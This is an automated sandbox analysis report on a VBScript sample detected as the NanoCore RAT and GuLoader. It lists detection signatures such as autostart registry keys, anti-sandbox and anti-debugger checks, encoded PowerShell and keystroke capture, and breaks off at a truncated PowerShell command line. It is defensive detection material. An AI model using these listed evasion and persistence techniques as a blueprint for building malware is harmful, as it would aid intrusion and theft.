Windows
Analysis Report
IMG 0045434.vbs
Overview
General Information
Detection
Nanocore GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%
Signatures
Found malware configuration
Malicious sample detected (through community Yara rule)
Sigma detected: NanoCore
Detected Nanocore Rat
Antivirus detection for URL or domain
Yara detected Nanocore RAT
Yara detected GuLoader
Hides threads from debuggers
Creates an autostart registry key pointing to binary in C:\Windows
Creates multiple autostart registry keys
Tries to detect Any.run
Wscript starts Powershell (via cmd or directly)
Potential malicious VBS script found (suspicious strings)
Potential malicious VBS script found (has network functionality)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Encrypted powershell cmdline option found
Very long command line found
Suspicious powershell command line found
Creates autostart registry keys with suspicious values (likely registry only malware)
C2 URLs / IPs found in malware configuration
Hides that the sample has been downloaded from the Internet (zone.identifier)
Uses dynamic DNS services
Queries the volume information (name, serial number etc) of a device
Yara signature match
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Found dropped PE file which has not been started or loaded
Contains long sleeps (>= 3 min)
Abnormal high CPU Usage
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Java / VBScript file with very long strings (likely obfuscated code)
Installs a raw input device (often for capturing keystrokes)
Drops PE files
Tries to load missing DLLs
Detected TCP or UDP traffic on non-standard ports
Checks if the current process is being debugged
Sigma detected: Suspicious Csc.exe Source File Folder
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Compiles C# or VB.Net code
Sigma detected: Suspicious Execution of Powershell with Base64
Creates a process in suspended mode (likely to inject code)
Sigma detected: Autorun Keys Modification
Found WSH timer for Javascript or VBS script (likely evasive script)
Classification
- System is w10x64native
- wscript.exe (PID: 7064 cmdline: C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\IMG 0045434.vbs" MD5: 0639B0A6F69B3265C1E42227D650B7D1)
  - powershell.exe (PID: 7640 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand